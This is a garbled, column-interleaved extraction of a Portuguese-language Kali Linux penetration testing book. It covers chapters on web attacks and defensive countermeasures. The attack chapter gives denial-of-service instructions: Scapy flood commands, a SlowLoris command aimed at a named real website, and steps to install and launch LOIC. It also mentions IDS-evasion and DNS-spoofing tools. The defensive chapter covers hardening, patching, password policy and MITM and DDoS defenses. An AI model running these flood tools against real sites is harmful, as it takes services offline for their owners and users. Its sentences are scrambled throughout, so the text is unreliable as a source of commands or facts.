anterior, SEQ # == 0) count = 2000) "10.20.30.40") / estamos enviando 2000 pacotes a enviar (IP (dst = "10.0.0.1") / TCP Fonte endereo IP == Destination TCP (dport = "www", dataofs = 1 L), partir de nossa eth0 interface (flags = "", seq = 555), iface = "eth0", Address iface = "eth0", count = 2000) count = 2000) enviar (IP (dst = "10.0.0.1", src = SlowLoris Bandeiras Bad TCP (All Flags Set) "10.0.0.1") / TCP (dport = "www"), [240] http://ckers.org/slowloris permite que um usurio para fazer loic.sh chmod 777 Captulo 6 Para executar SlowLoris, baixe o . Pl testes de estresse diretamente de um O ltimo passo executar o script SlowLoris um cliente HTTP baixa script e abrir um terminal de comando. navegador web. usando o seguinte comando: largura de banda que pode emitir Ir O software foi usado famosa por . / Loic.sh instalar ataques DoS. O que faz para a pasta com o script e digite: Anonymous para ajud-los a facilitar [243] SlowLoris nico o seu mtodo de perl slowloris.pl ataques DDoS atacar um alvo sem usar inundaes Isso far com que o ecr principal. contra vrios sites, incluindo algumas Ataques na Web comum Para executar SlowLoris em um alvo, entidades pblicas muito conhecidas. Se voc no receber quaisquer tcnicas. SlowLoris mantm conexes digite o Alguns mensagens de erro da execuo do abertas atravs do envio de mesmo comando seguido de -Dns e argumentao jurdica foram feitos script, ento voc est pronto para solicitaes HTTP parciais. Ele seu alvo. Por exemplo, para atacar que LOIC semelhante a ir a um site atualizar loic. Para atualizar, use o continua a enviar centenas de www.thesecurityblogger.com, Digite: vrios seguinte comando: cabealhos subseqentes em perl slowloris.pl-dns mil vezes, no entanto, alguns grupos . / Loic / update sh intervalos regulares para manter thesecurityblogger.com de policiais americanos tratam o uso Finalmente, hora de lanar LOIC. soquetes de fechamento. Este [241] de Voc pode fazer isso usando o comportamento vai sobrecarregar os LOIC como uma violao da lei de seguinte comando: recursos do alvo, fazendo com que Ataques na Web segurana de computador e fraude. . / Loic.sh prazo o incapaz de responder ao trfego Voc vai ver SlowLoris consumir [242] Usando LOIC simples. Voc pode legtimo. Sites de alto trfego pode soquetes disponveis, o que acabar selecionar se voc gostaria de usar o levar um longo tempo por levar para baixo Captulo 6 modo manual para liberar soquetes disponveis, seu alvo: Para instalar o LOIC, Abra uma janela ou Modo de IRC. Vamos escolher o porque os outros usurios devem Se SlowLoris capaz de fazer a sua de terminal e digite: modo manual para o seguinte terminar seus pedidos antes magia, o seu alvo ficaro apt-get update exemplo. as tomadas se tornam disponveis indisponveis: aptitude install git-core monodevelop Em seguida, voc pode escolher o para SlowLoris para consumir. No DoS exemplo ataque apt-get install mono-gmcs URL ou endereo IP que pretende entanto, SlowLoris www.thesecurityblogger.com (Por Uma vez que seja completa, v para o inundar. Vamos usar o IP acabar por inundar todos os favor, no diretrio desktop usando cd / Desktop endereo 127.0.0.1 por exemplo, o soquetes disponveis, matando servio teste contra este site) e criar um seguinte. LOIC oferece opes de ao site da vtima. Low Orbit Ion Canho pasta chamada loic usando o seguinte ataque, se voc gosta SlowLoris tira proveito de servidores Low Orbit Ion Canho (LOIC) uma comando: para modificar as configuraes de que utilizam processamento de rosca, ferramenta de teste de estresse de mkdir loic TCP ou UDP. o que significa rede, o que significa que projetado Navegue at a pasta usando cd / loic [244] vulnervel a limitar a quantidade de para testar a quantidade de trfego de e digite o seguinte comando: rosca permitida. Exemplos incluem um alvo pode manipular para o wget Captulo 6 1.x Apache, 2.x, dhttpd, GoAhead, e planejamento de expectativas futuras https://raw.github.com/nicolargo/loicins Quando voc estiver pronto para assim por diante. de recursos. taller/ lanar o seu ataque, pressione o No SlowLoris no vem instalado no O software tem inspirado outros master / loic.sh boto de IMMA CHARGIN Kali Linux. Voc pode baixar a partir softwares similares, tais como Em seguida, dar permisses para o de SlowLoris JavaScript, LOIC, que arquivo de script usando o comando: MAH LAZER. LOIC mostrar o ataque a Internet. Para que isso funcione, medir o desempenho do seu cdigo reao e ponto de vista forense. est em andamento. Clique no Pare voc precisa ter acesso e modificar as sob coao. Siege oferece multi- Inundator tambm pode ser usado de Inundaes entradas DNS em um thread para testar a eficcia boto para parar o ataque: nico servidor ou veneno real DNS Testes de carga HTTP e do sistema de alerta de suas Outras ferramentas para que o trfego chega ao servidor benchmarking por bater um servidor ferramentas de relatrios de Kali Linux oferece muitas ferramentas Kali Linux. O web com um configurvel segurana, como SIEM e IDS / IPS. que podem ser teis para ataques DNSChef ferramenta fcil de usar, nmero de concorrentes, os usurios TCPReplay baseados na web. Aqui esto no entanto, o desafio o mtodo de simulados. Siege oferece uma TCPReplay utiliza trfego previamente algumas ferramentas adicionais ataque de DNS para regresso, simulao Internet capturado em libpcap formato para disponveis em Kali Linux que no direcionar o trfego para Kali Linux. e modos de fora bruta. testar uma variedade de foram cobertos e poderia SniffJoke Voc pode encontrar sob cerco Teste dispositivos de rede. TCPReplay pode ser usado para testes de penetrao SniffJoke lida com a sua conexo TCP de Estresse |Testes de stress de rede classificar o trfego como cliente ou remoto. transparente, proporcionando atraso, |Siege: servidor, reescrita Camada DNSCHEF modificando Para executar Siege, digite o seguinte 2, 3 e 4 cabealhos e repetir o trfego DNSChef um proxy DNS para e injetando pacotes falsos dentro de comando: de volta para a rede, bem como Penetration Testers e malware sua transmisso. Este processo faz cerco [opes] <target URL> atravs de analistas. Um DNS com que seja extremamente A imagem seguinte mostra a outros dispositivos, tais como proxy tambm conhecida como "DNS difceis para uma tecnologia passiva execuo cerco contra switches, roteadores, firewalls e IDS / Falso" uma ferramenta utilizada para escutas telefnicas como um IDS / www.thesecurityblogger. IPS. TCPReplay apoios o trfego de rede aplicao IPS ou sniffer para com. A contagem de usurio padro modos NIC simples e dupla para anlise e outros casos de uso. Domain interpretar correctamente o trfego. 15, como mostrado na imagem. testar tanto sniffing e dispositivos Name System (DNS) uma Isto feito atravs da explorao do Quando voc parar o embutidos. nomenclatura distribudo que se presume registada Testes de Siege, a ferramenta fornece Basicamente, TCPReplay pode sistema para computadores, servios por um sniffer e que transmitido pelo um teste de estresse ps-relatrio da capturar o trfego entre o cliente eo ou qualquer recurso conectado cliente, fazendo com que este seguinte forma: servidor, e reproduzi-lo Internet ou privada inconsistente para o [247] qualquer ponto da rede. rede. Fornecer endereos DNS falsos algoritmo de remontagem pacote. Os [248] podem redirecionar o trfego para prximos dois diagramas de mostrar o Ataques na Web outros locais desejados. trfego de escutas telefnicas Inundator Captulo 6 [245] entre dois usurios sem e com Inundator uma ferramenta que foge Resumo SniffJoke. Sistemas de Intruso deteco (IDS) e Este captulo termina revendo vrios Ataques na Web [246] Intrusion mtodos disponveis em Kali Linux 1.0 Por exemplo, uma procurao DNS Sistemas de Preveno (IPS) por que pode ser utilizada para pedidos de Captulo 6 inundar seus arquivos de log. O poderia ser usado para realizar testes falsos badguy.com apontar Cerco conceito que voc pode de penetrao contra servidores de uma mquina local para a resciso ou Siege um HTTP / HTTPS utilitrio quer inundar um alvo com falsos aplicativos web. Em interceptao em vez de uma srie de testes de estresse projetado para positivos, assim voc pode se Neste ponto, os leitores devem saber verdade em algum lugar desenvolvedores web esconder de um ataque real a partir de como pesquisar um alvo, identificar as um vulnerabilidades nesse alvo, bem como todas as O prximo captulo vai mudar de do conhecimento comum que Kali Linux uma ferramenta principal interaes associadas com host e marcha, olhando para como se existem pessoas ms sistemas de teste de penetrao que podem ser clientes, explorar defender de aplicaes web ataque sobre a utilizados para identificar onde vulnerabilidades, e servios de utilizando ferramentas disponveis no Internet, independentemente da sistemas so vulnerveis a ataques. interrupo, se desejar. Este texto Kali Linux 1.0. natureza do negcio. Como uma Ao invs de atacar um alvo, uma breve viso geral das [249] medida contra defensiva, recomendamos ferramentas organizaes depositam sua Penetrao Teste seus prprios ativos disponvel em Kali Linux, no entanto, Contramedidas defensivas confiana em solues para defesa de rede para identificar as existem muitas outras ferramentas At este captulo, ns cobrimos como contra essas ameaas cibernticas. O vulnerabilidades antes de um alm Kali Linux usar Kali Linux para comprometer as problema com essa estratgia o indivduo mal-intencionado bate-lhe a que devem ser includos em seu metas. vendedor no vtima de um ataque e ele. Para citar Sun Tzu a partir de A arsenal Teste de Invaso. Kali Linux Agora hora de trocar as marchas e no Arte da Guerra: oferece uma srie se tornar o zagueiro com o objetivo de absorver os danos de um incidente "Se voc conhece o inimigo e conhece de valor, com conjuntos de evitar ciberntico. Os vendedores vo a si mesmo, voc no precisa temer o ferramentas nativas, no entanto, as sendo comprometida por mtodos que oferecer proteo, no entanto, resultado de um melhores ferramentas de tm demonstrado neste livro, bem eles no podem ser responsveis por cem batalhas. Se voc se conhece alavancagem Penetrao Testers como qualquer coisa fora do controle do seu mas no o inimigo, para cada vitria alm de Kali, tais como ataques do outras formas de ataque. Defendendo produto. Tudo o que precisamos ganha tipo Zero Day baseados em scripts e um recurso voltado para a Internet uma falta de atualizao, erro de voc tambm vai sofrer uma derrota. utilitrios personalizados. Ns extremamente difcil, configurao, ou milhes de situaes Se voc no conhece nem o inimigo recomendar pesquisando e testando com base no que est sendo exposta que podem causar uma nem a si mesmo, voc vai vrias ferramentas para mtodos de a todo o mundo atravs de acesso brecha para que o vendedor no ser sucumbir em todas as batalhas " ataque abordados neste pblico, misturado com o responsvel. Alm disso, muitas Ns acreditamos que os mesmos texto para crescer a sua experincia operaes exigncia de no ser capaz organizaes de alavancagem conceitos fundamentais so como um verificador da penetrao de impactar o servio a usurios solues de vrios fornecedores que verdadeiras; usar Kali Linux para profissional. confiveis a um custo no compartilham de inteligncia de conhecer a si mesmo, Este captulo concentra na de segurana. absolutamente crtico segurana, fazendo o possvel para e conhecer a sua fraqueza. identificao e explorao de para incluir a segurana em todo o responsabilidade a ser passado para A vantagem que voc tem que voc vulnerabilidades remotamente como ciclo de vida de trs e para frente entre os sabe que est acontecendo, voc relacionada a ataques baseados na concepo at a resciso do pblico fornecedores. Por estas e outras pode usar e extrema Internet. Cobrimos ataques de enfrenta qualquer coisa, em vez de razes, medidas sem a preocupao de explorao do navegador, Proxy considerar a segurana recomendamos aos clientes tomar acionar alarmes. Normalmente, os ataques, e colheita de senha. como uma reflexo tardia. Isto no s posse a responsabilidade de proteger hackers no vai arriscar Concluiu-se com os mtodos para ir reduzir o risco de ameaas contra os ativos por expondo-se, reduzindo as suas interromper servios o servio, sistemas de endurecimento das opes para o ataque. Discrio como um meio de aplicaes web de mas tambm provvel ser menos ameaas. requer pacincia, teste de estresse, bem como caro para remediar, no caso de um toque mnimo para o alvo, e muito identificar o quo vulnervel incidente ciberntico. Contramedidas defensivas planejamento. at voc para alvos so a ataques DoS. capitalizar sobre o seu capacidade de investir tempo e (PCI DSS). Ambientes de sade deve Vamos dar uma olhada na linha de recursos adequada em segurana atender Seguro de Sade base de segurana dos Estados antes que algum investe Portabilidade e Unidos de qualquer coisa o acesso a mais em atravess-lo. Um ditado Responsabilidade normas (HIPAA). uma comum entre os autores deste livro Preto, branco, cinza ou abordagem Mandatos comuns, como estes so rede controlada pelo governo. "99 por cento chapu? cobertos Sua linha de base para a segurana seguro um inseguro 100 por cento ". Teste uma cpia ou o sistema real? em Captulo 8, Relatrio Executivo deve ser o nvel mnimo absoluto de Este captulo ir fornecer diferentes Possveis riscos de Teste de Invaso? teste de penetrao, so segurana mtodos de utilizao de Kali Linux Quem deve ser informado? impulsionadores de negcios utilizado em seu ambiente. A melhor para auditar o seu web [252] populares para prtica assegurar sistemas alm do aplicativos para vulnerabilidades mostrando valor para os servios de linha de base, porque as linhas de comuns, bem como outras melhores Captulo 7 testes de penetrao. base de segurana como mais prticas para o endurecimento Fora dos mandatos, um bom ponto de documentados so limitados, devido sua rede. Ns vamos cobrir as linhas partida para o estabelecimento de a data de publicao, a influncia dos de base de segurana, gerenciamento Voc est testando deteco e uma linha de base para a segurana partidos de financiamento, e outros de patches, password resposta a ameaas ou focando est analisando como outras agncias elementos. polticas, e defender-se contra os identificao de vulnerabilidades? de proteger seus sistemas. Como [253] mtodos de ataque, cobertas nos So todos os padres de consultores de segurana para captulos anteriores. conformidade a ser considerada? Clientes americanos, identificamos Contramedidas defensivas Este captulo tambm inclui uma Vejamos que estabelece um plano como o governo dos Estados Unidos STIG seo focada em usar Kali Linux em para validar a nossa segurana. assegura sensvel AGuia de Segurana Tcnico de um forense Primeiro precisamos informao como um exemplo para a Implementao (STIG) uma investigao. Forensics importante conhecer a nossa linha de base para a segurana da linha de base. A maioria metodologia para depois de identificar que sua aplicao segurana, por isso sabemos o que das organizaes norte-americanas instalao e manuteno do software web ou para validar contra. seria de computador seguro e padronizado outros ativos ter sido comprometida, Segurana da linha de base estar interessado em ter padres de hardware. Este termo foi cunhado pelo para evitar futuras impacto negativo. Uma pergunta comum feita por segurana semelhantes como a Casa Agncia de Defesa de Sistemas de Testando suas defesas especialistas do setor o que deve Branca. Esta mesma Informao Como explicado na introduo, a ser o mnimo conceito pode ser aplicado a outros (DISA), que cria documentos de melhor abordagem para endurecer a nvel aceitvel de segurana. Muitas padres de TI pas, a segurana configurao em apoio da sua defesa organizaes devem estar em organismo especfico Organizao das Naes atacando seus controles de segurana conformidade com melhores prticas, ou controles Unidos Departamento da defesa existentes, com o objetivo de mandatos especificados por sua militares recomendadas de segurana. (DOD). As diretrizes de identificar fraqueza. indstria e do governo. Qualquer H tambm as melhores prticas implementao incluem Alguns conceitos-chave a considerar sistema de aceitar para os padres de segurana processos administrativos ao desenvolver uma estratgia para pagamentos devem aderir ao Payment publicados a partir de organizaes recomendadas e controles de testar seu ciberntico Card Industry Data Security Standard formadas por fornecedores e indstria segurana utilizados durante o defesas de segurana so os lderes, como a Organizao ciclo de vida do ativo. seguintes: Internacional de Normalizao (ISO). Um exemplo onde Stigs seria de Existem muitos outros recursos e reagindo aos sistemas identificados benefcio est na configurao de uma disponveis para encontrar segurana Implantar como rea de trabalho modelos de normalizao. Exemplos Patches vulnervel. Como explicado em computador. A maioria dos sistemas so o Center for Internet Atualizar Captulo 1, Teste de Invaso e operacionais no so inerentemente Segurana (CIS) e Cisco Protection Vulnerabilidade configurao, sendo seguros, deixando-os vulnerveis Network Foundation (NFP). Detalhes vulnervel no significa para os criminosos. A STIG descreve O gerenciamento de patches a partir de necessariamente que h um risco a como minimizar ataques baseados na Com ataques direcionados e Vendedores menos que a vulnerabilidade rede e prevenir vulnerabilidades de dia zero, Digitalizar o validada atravs da explorao, o acesso ao sistema quando o invasor reduzindo a janela de tempo Rede durante um teste de penetrao ou est presente no dispositivo. Stigs entre o momento em que uma Identificar outro mtodo. tambm descrevem vulnerabilidade divulgada e os Vulnervel Protegendo a vulnerabilidade pode processos de manuteno, tais como atacantes desenvolver um exploit, Sistemas simplesmente exigir um patch ou atualizaes de software e patches tornando-se mais compete gerentes Gerenciamento de patches apenas atualizao, no entanto, vulnerabilidade. de segurana de entender os ativos um aspecto do ciclo de vida maior algumas vulnerabilidades podem Stigs so grandes diretrizes para em sua vulnerabilidade. O primeiro exigir mais investimento em tempo e proteger os sistemas operacionais, Ambiente de TI, e os nveis de passo identificar as vulnerabilidades, trabalho para remediar. dispositivos de rede, e correo desses sistemas. o que pode ser feito atravs de Clculo do risco associado ao aplicaes. Voc pode baixar Gerenciamento de patches um atualizaes do fornecedor ou investimento para remediar entra em diretrizes STIG de processo contnuo e s pode ser bem servios que vo da verificao jogo http://www.stigviewer. sucedido se houver um mtodo para peridica de testes de penetrao de para estas situaes. com.br / Stigs. Voc vai encontrar identificar quando hardcore. L O passo final no gerenciamento de documentos STIG contm guias um patch est disponvel, priorizar deve ser uma poltica que explica patches est programando o patch passo-a-passo para o endurecimento quando implementar o patch, valid-lo como muitas vezes diferentes nveis que se refere uma variedade de sistemas, incluindo sobre de exames so realizados como crtica a vulnerabilidade a servidores web. Alm disso, as o cumprimento do negcio, e como assim como quem o responsvel operaes comerciais. Esta uma diretrizes STIG so um ponto de reagir quando um patch no est para analisar as ameaas que so chave, como muitos partida disponvel para um conhecido encontrados. Um bom ponto de sistemas comprometidos poderia ter apontam para a configurao de vulnerabilidade. Isso vale tambm partida sido salvo se fossem corrigidas antes sistemas para atender a vrios para aplicaes dentro dos sistemas e para estabelecer uma linha de base de ser padres de conformidade software, tais para a freqncia de varredura de identificado por um partido malicioso. regulamentar. como plugins. vulnerabilidades est revendo o que Ns encontramos muitos dos nossos Para Estados Unidos funcionrios [254] padres de conformidade clientes tm manuteno federais, Stigs so necessrios para regulamentar que deve seguir, como janelas programadas em uma base os sistemas em redes Captulo 7 muitos incluem lngua em torno de mensal ou mais para o gerenciamento controlado pelo Departamento de Gerar varredura de vulnerabilidades internas de patches, que Defesa e outras organizaes Estado e externas. deixa uma grande janela de tempo governamentais. Relatrios O segundo passo para o para serem expostos, no caso de um Baixar gerenciamento de patches est sistema se torna vulnervel a ataques. A melhor prtica para simplificar as senhas de qualquer 14.800, de 16 caracteres senhas hash Os ataques do lado do cliente deste a atribuio de um especialista maneira, possivelmente usando criptograficamente de uma lista livro. Ferramentas sugeridas so John Information Assurance caracteres repetidos, previsvel de 16.449. Este um caso especial no the Ripper, Johnny, da responsabilidade do clculo do comportamento, como o uso de 12345 momento da publicao, no entanto, Hashcat, oclHashcat, e Ophcrack. risco associado com sistemas para estender o comprimento de uma ser o campo de batalha comum para Triturao e Hashcat pode tambm identificados como senha, ou outros meios. hackers futuras. Considere o ser usado para vulnerveis, bem como ter a Os usurios tambm normalmente comprimento recomendado de uma gerar listas de senhas para que autoridade para janelas de no alterar senhas a menos que senha de um alvo em movimento. possam comprovar a fora de sua manuteno quando um trunfo forado por um sistema. Para estes Os autores deste livro so fs de poltica de senha. ameaa atinge um determinado nvel razes, uma poltica de senha deve gerador de senha por Steve Gibson, Existem sites disponveis, como de risco para as operaes seguir as seguintes orientaes: como um seguro Crackstation, que oferecem pr- comerciais. mtodo de gerao de senhas gerada [255] aleatrias. O gerador de seguro senha listas de senhas populares. Voc pode aleatria usar estas listas para testar a fora da Contramedidas defensivas por Steve Gibson pode ser encontrado suas senhas e polticas. Gerenciamento de patches uma das no Centro de Pesquisa Gibson em: Espelhe o seu ambiente melhores estratgias de defesa para https://www.grc.com/ Antes de testar um sistema contra evitar muitos dos J possui uma validade que est em passwords.htm. uma configurao de segurana ameaas apresentadas neste livro. 90 dias [256] recomendada, a verificao de Certifique-se de rever como a sua No permitir que as ltimas cinco vulnerabilidades, ou validao de um organizao senhas como substitutos Captulo 7 sistema vulnervel atravs da lida com o gerenciamento de patches Aplicar um comprimento de pelo Muitos sites e aplicaes web so explorao, pode periodicamente para evitar ser vtima menos 12 caracteres comprometidas, porque web fazer sentido para clonar o sistema de expor uma No limitar quaisquer caracteres, desenvolvedores implementados para fins de teste, em vez de testar o sistema vulnervel que poderia ter como caracteres especiais protocolos de segurana pobres. Os real sido assegurada. Isto deve aplicar-se Mandato pelo menos uma letra desenvolvedores da Web sistema. As melhores prticas so a todos gerenciados maiscula, nmero e caractere deve usar criptografia forte para replicar tudo, desde o hardware de ativos, incluindo servidores e especial armazenar senhas de usurios e hospedagem na web aplicaes web. Avisar ou negar dgitos repetio dados. aplicao a todo o contedo, porque As diretivas de senha como 12345 ou asdfg para evitar As senhas devem implementar pode existir vulnerabilidades em todas Em geral, ter uma poltica que controla ataques de fora bruta hashing e salga tcnicas para as camadas de tecnologia. os resultados possveis pode impactar Processamento do computador est promover Testando um ambiente clonado vai negativamente constantemente a melhorar, o que mitigar os riscos em dados roubados dar a liberdade Tester Penetrao a fora de palavras-passe. significa 12 caracteres ou perdidos. para executar Independentemente da poltica, os senhas no ser forte no futuro Voc pode avaliar a fora das senhas qualquer grau de ataque, evitando usurios tero pela natureza humana, prximo. Um artigo recente usadas em sua alavancagem sistemas impacto negativo s operaes. tente publicado na primavera de 2013, ferramentas de quebra de senha Embora a maioria afirmou uma equipe de hackers abordados Captulo 3, os ataques lado rachado mais de do servidor, e Captulo 4, as pessoas no podem espelhar o No momento da escrita, HTTack j Aqui esto mais algumas ferramentas acessada usando HTTPS ou ambiente exato, geralmente possvel no vem pr-instalado com Kali. Para de clonagem de sites disponveis na conexes seguras HTTP. Verificando a criao de um virtuais instalar Kali Linux. Mais uma vez, HTTPS no to fcil ambiente com a mesma HTTack, abrir um Terminal janela e essas ferramentas no ir replicar o como a procura de um pouco de barra funcionalidade. tipo apt-get install httrack. Uma vez contedo dinmico, nem iro replicar de endereos verde com um smbolo HTTrack a instalao estiver concluda, voc site de bloqueio, porque os atacantes HTTrack um utilitrio de navegador pode iniciar HTTrack, abra um middleware, tais como bancos de podem offline livre. HTTrack permite que voc Terminal e tipo httrack. dados. Portanto, eles no podem ser servir certificados das vtimas para baixe um site Voc ser solicitado a dar um nome apropriados em todos fazer parecer que a sesso segura. a partir da Internet para um diretrio de projeto, o caminho para instalar o Ambientes de teste de penetrao. [259] local, construir todos os diretrios, site (o padro captura de HTML, imagens, root / sites /) E URLs para copiar. Contramedidas defensivas e outros arquivos a partir do servidor e HTTrack d algumas opes para WebCopier: uma ferramenta que Para testar adequadamente uma armazenar em seu computador. Voc copiar o seu clona um site para avaliao off-line, sesso HTTP, examinar o certificado e pode navegar na clonado alvo (s), conforme mostrado na tela a tais olhar para o certificado link do site-to-link, bem como test-lo seguir. Algumas perguntas opcionais como testes de penetrao. autoridade. Este esforo adicional em busca de vulnerabilidades. adicionais w3mir: uma cpia HTTP para todos desencoraja muitos usurios de HHTrack extremamente est definindo wildcards e nvel os fins e ferramenta de espelhamento. verificar um seguro ferramenta simples para trabalhar com recursivo. Ns selecionamos a opo A principal sesso, o que torna este mtodo de sites bsicos. No vai replicar o 2. Depois de responder a foco de w3mir criar e manter uma ataque muito eficaz. contedo dinmico, nem perguntas, selecione Yclonar o seu cpia navegvel de um, ou A figura anterior mostra um certificado ser que vai replicar site middleware, alvo (s). vrios, sites WWW remotas. SSL para o Gmail foi emitida pelo tais como bancos de dados. Por isso, HTTrack vai comear a clonar o seu Man-in-the-middle defesa Google pode no ser alvo e todos os links associados. Pode Ataques man-in-the-middle so Autoridade Internet. Isto soa muito apropriada em todos os ambientes de demorar um pouco para difceis de proteger contra. O ataque bem, mas quem o Google Internet testes de penetrao. concludo, dependendo do tamanho acontece fora Autoridade? [257] do seu alvo. A prxima imagem de ambiente controlado da vtima e, Posso confiar neles? Ser que mostra HTTrack quando executado corretamente, no realmente o Google? Neste exemplo, Contramedidas defensivas clonagem deixa um eu tenho um outro certificado Para testar todos os aspectos de um www.thesecurityblogger.com. assinatura bvio que alertar as vtimas autoridade apresentada por cima da site, voc ter que usar outro software [258] envolvidas. MITM tipicamente o Internet Autoridade Google chamado para primeiro passo de Equifax seguro clonar um alvo. Esse software deve Captulo 7 um ataque mais sinistra como tira Autoridade de Certificao. Equifax incluir a captura de middleware e Navegue at a pasta que voc SSL. Uma maneira comum de se tem uma srie de verificaes e contedo dinmico, bem como, especificou para salvar as metas proteger contra MITM balanos antes de emitir possivelmente, exigir acesso de clonados para iniciar o seu teste. garantir sites usam SSL / TLS 3.0. certificado para garantir um negcio administrador Outras ferramentas de clonagem Em outras palavras, certifique-se os vlido. Verificando que Equifax gerou direitos sobre o alvo. sites so este certificado que me faz sentir confiante que inclui um nome de usurio e Controle de Segurana (MACsec) e verso do site criptografado, para uma de que posso confiar neste certificado. senha, juntamente com algumas 802.1x. Estas abordagens usar redes verso criptografada do site. Quando Em ltima anlise, HTTPS depende outras formas de avanadas voc navega do conceito de confiana. Para ser autenticao, tal como OTP (De uma para fornecer autenticao de origem, para http://www.facebook.com ou mais explcito, a questo s vez senhas), tokens, ou integridade de dados e criptografia http://www.gmail.com, Voc vai notar se resume a confiar na autoridade de certificados. Este como viagens de trnsito que voc est certificao que emitiu o certificado faz com que seja difcil para um em toda a rede. Ambas as redirecionado para vlido atacante para roubar a autenticao abordagens requerem compatibilidade https://www.facebook.com e e legtimo. Para ambientes de necessria para estabelecer com os equipamentos e deve ser https://www.gmail.com. Tira SSL laboratrio, comum encontrar uma VPN usado por outro usurio. activada correctamente, de modo a quebra o redirecionamento e obriga a certificados auto-assinados VPNs tm a capacidade de utilizar ser eficaz. vtima a usar a verso no segura do que os alarmes gatilho da maioria dos mtodos de criptografia, tais como Defesa tira SSL site. Alm disso, ainda mesmo que o navegadores de Internet mais PPTP, L2TP, SSL e IPSEC. Tira SSL (coberto de Captulo 3, os site no tem uma verso no-seguro, populares. Esse pop-up irritante que SSL e IPSEC VPNs fornecer ataques lado do servidor, permite que mas tem usurios se queixam ao acessar sites segurana de nvel superior para a atacantes para tirar ou arrancar um redirecionamento, tira SSL ir serve como um meio para avisar que guarda de dados em comparao com a parte criptografada de um site e ver interceptar a solicitao HTTP e a outros protocolos por causa de seu sesso de Internet da vtima, incluindo encaminhar o usurio para HTTPS autoridade de certificao no uso de protocolos de criptografia forte informaes confidenciais. comum site. Quando a vtima faz isso, o provvel confivel, e h o risco de um de criptografia. vincular tira SSL com outro ataque, atacante poder ver toda sesso da ataque MITM. VPNs so fornecidos por ambas as como vtima. [260] organizaes pblicas e privadas. como um man-in-the-middle, o que Um mtodo para se proteger contra possvel que o provedor de VPN pode significa hackers ir capturar todo o ataques de strip SSL garantir que os Captulo 7 ser capaz de analisar o seu trfego, trfego e despir SSL sites no tm Criptografado Virtual Private Network porque eles so os prestadores de criptografia de modo que tudo visvel uma verso no-seguro de si mesmo (VPN) uma outra forma de proteo servios confiveis. Portanto, a para trfego sniffing ferramentas do e que no implementar recursos de contra questo hacker. Cobrimos redirecionamento. Este man-in-the-middle. Ao criptografar de confiana ainda um conceito este conceito em Captulo 5, Atacar de impediria um ataque sslstrip, porque todos os dados enviados de e para o muito importante quando se utiliza autenticao, deste livro. no existe a possibilidade de seu dispositivo uma VPN. Voc deve [261] redireccionamento. Quando um ao mascarar o seu endereo (IP) perguntar se voc confia no seu vtima atacada, eles simplesmente Internet Protocol, VPNs criptografadas provedor de VPN para proteger seus Contramedidas defensivas no ser capaz de chegar a um garantir dados e privacidade. Para se proteger contra ataques de website. Entendemos a partir de que voc estiver em uma rede que Sua segurana de dados est nas strip SSL, importante entender como um ponto de vista a implementao do no podem ser monitoradas ou mos do prestador de servios. tira SSL mundo real que isso muito difcil de gravadas por ningum, exceto Outras tcnicas que podem ser explora uma vtima. O ataque se aplicar. As pessoas so o fornecedor de VPN. usadas para se defender contra os aproveita de sites redirecionando os utilizado para a digitao de um VPNs pode usar mtodos de ataques MITM so Acesso mdia usurios a partir de um no- pedido HTTP no-seguro e ser autenticao forte, como a au- redirecionado automaticamente tenticao de dois fatores, quando necessria segurana. Alm disso, Um dos mtodos mais comuns para e tcnicas avanadas de DNS. Pacotes Teardrop. Solues DDoS muitas empresas no gostaria que os se defender contra DDoS / DoS a A maioria dos ataques de DDoS / DoS Leading / DoS oferecem a capacidade usurios a pensar o seu site configurao de rede usar endereos IP falsos ou invlidos para monitorar est em baixo devido a no aceder a dispositivos que podem lidar com ao atacar DDoS internos e externos / ameaas uma verso segura do site. Portanto, a grande fluxo de pacotes, a capacidade uma organizao. Os administradores DoS. melhor proteo de detectar anomalias de rede devem implementar Unicast Defesa de Cookies a partir de lminas SSL educar os padres de comportamento e de Inverter caminho Como discutimos em captulos usurios sobre como os ataques trfego. Trfego malicioso identificado Encaminhamento (Unicast RPF) em anteriores, biscoito seqestro uma cibernticos ocorrer para que possam deve ser automaticamente seus roteadores de borda voltados tcnica onde um atacante identific-los. filtrou-se para evitar a interrupo do para a Internet como uma proteo rouba cookies de sesso. Biscoito Para alm disso, os mtodos de servio. Ferramentas de fornecedores, mecanismo contra a falsificao de seqestro pode ser derrotado se o seu defesa esboamos anteriormente tais como balanceadores de carga endereos de origem IP quando usado site est funcionando contra man-in-the-arbtrio meio e firewalls de aplicativos web, fazer para lanar ataques DDoS SSL / TLS 3.0. Muitos atacantes ir tambm defender contra ataques de um grande trabalho de deteco e ataques. Unicast RPF considerado ignorar o SSL / TLS, usando uma strip SSL. A razo para isto tira SSL defesa contra melhores prticas para-virado de combinao de man- depende de um homem- volumtrica e ataques do tipo de ponta da Internet roteadores, no entanto, ao assegurar a sua in-the-middle ataque ocorra. aplicao. Ferramentas de segurana e um bom comeo para se defender aplicao web s; in-the-middle ou Negao de Servio defesa com capacidade de deteco de DoS contra DDoS / DoS. Unicast RPF est ataques tira SSL A maioria Distribudo ou padro Denial so capazes de reconhecer rede, configurado no tem pginas seguras, ou seja, no of Service (DDoS / DoS) ferramentas sesso e trfego da camada de nvel de interface em roteadores fornecer um redirecionamento HTTP esto abertos aplicao, que importado Cisco. Outra empresa fabrica pode ter para HTTPS, ir atenuar utilitrios de cdigo escrito em C # ou para mitigar riscos de DoS que pode semelhante as formas de ataque. Java. Foi demonstrado em Captulo 6, existir em todas as camadas da pilha caractersticas em seus roteadores Biscoito seqestro pode trabalhar ataques na Web, de protocolos. tambm. Quando Unicast RPF est atravs de conexes SSL / TLS, se os como uma nica pessoa usando uma [262] configurado, no-verificvel atacantes usam ferramenta de DoS podem ter um ou endereos IP invlidos sero cross-site scripting para enviar cookies impacto devastador para um negcio Captulo 7 descartados. para seus servidores. Os limitando o acesso a fontes on-line ou Para se defender contra os ataques Uma tcnica mais recente utilizada desenvolvedores podem mitigar derrubar um site. Ferramentas DDoS / contnuos e prolongados, muitas para identificar trfego DDoS / DoS esse risco, definindo o Proteger e DoS so organizaes se voltam para a est alavancando Netflow em HttpOnly Bandeiras na cookies. anunciado como aplicaes web Provedor de servios de aplicao conjunto com as listas de acesso de Um erro comum sobre segurana de ferramentas de testes de estresse. DDoS. Um prestador de servio de trnsito a parar o trfego de entrada aplicaes web est assumindo Embora eles poderiam potencialmente aplicao DDoS trabalha com na rede como desenvolvedores ser utilizado para que, em muitos seu ISP e as tentativas de parar de bem como a identificao de ataques garantir toda a sesso, em vez de casos, eles so utilizados para fins DDoS de chegar a sua rede, internos. Comportamento do trfego apenas o portal de autenticao para nefastos. redirecionando o trfego analisado e 